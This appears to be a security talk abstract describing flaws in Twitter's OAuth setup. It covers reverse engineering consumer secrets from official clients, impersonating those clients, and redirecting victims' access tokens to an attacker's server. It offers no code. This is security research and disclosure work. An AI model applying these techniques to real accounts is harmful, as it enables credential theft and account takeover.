Since March 2013, Twitter’s new web API requires every request to be signed with OAuth. This mechanism is supposed to prevent abuse and also allow Twitter to ban third-party clients who do not adhere to their new, much stricter terms of service. After studying how Twitter API uses OAuth, it turns out that the required authentication is inefficient in letting Twitter control third party applications. A rogue client can impersonate a ‘blessed’ client by using its OAuth consumer tokens and access the API unnoticed. Consumer tokens are supposed to be kept secret, but we’ll see various fun and dynamic reverse engineering techniques for extracting them from popular Twitter clients including the latest versions for OS X and iOS. We also found that Twitter allows several third-party clients to redirect access tokens to a URL defined by the client. As you can impersonate the client, you can redirect the access tokens to your own pirate server. I’ll explain how to trick someone into giving you access tokens for his account without noticing and without moving away from Twitter’s secure website. I’ll end by discussing the Twitter API from a security standpoint and explain that to a great extent, many issues are caused by a fundamental mistake – Taking OAuth authentication from the web to the desktop.